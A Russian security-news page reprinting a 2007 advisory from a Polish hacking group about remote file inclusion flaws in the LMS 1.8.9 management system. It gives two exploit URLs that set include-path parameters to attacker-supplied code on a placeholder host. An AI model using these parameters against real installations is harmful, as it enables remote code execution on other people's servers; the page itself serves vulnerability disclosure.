Информационная безопасность
[RU] switch to English


Дополнительная информация

  Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl )

  Image_Upload Script  Remote File Inclusion Exploit Free Image Hosting 2.0

  Net Side Content Management System

  aspWebCalendar Remote SQL Injection Vulnerability

  ttCMS <= v4 (ez_sql.php lib_path) Remote File Inclusion Vulnerability

From:Kacper <kacper1964_(at)_yahoo.pl>
Date:25 марта 2007 г.
Subject:LMS <= 1.8.9 Vala Remote File Inclusion Vulnerabilities

DEVIL TEAM - HACKING POLISH TEAM

Author: Kacper
Contact: [email protected]
Homepage: http://www.rahim.webd.pl/
Irc: irc.milw0rm.com:6667 #devilteam
--------------------------------------------
Pozdro dla wszystkich z kanalu IRC oraz forum DEVIL TEAM.


LMS <= 1.8.9 Vala Remote File Inclusion Vulnerabilities
script download/homepage: http://www.lms.org.pl/


--------------------------------------------
Vulnerabilities:

http://strona.pl/lms_path/modules/userpanel.php?CONFIG[directories][userpanel_dir
]=[evil_code]
http://strona.pl/lms_path/modules/welcome.php?_LIB_DIR=[evil_code]

# milw0rm.com [2007-03-22]

О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород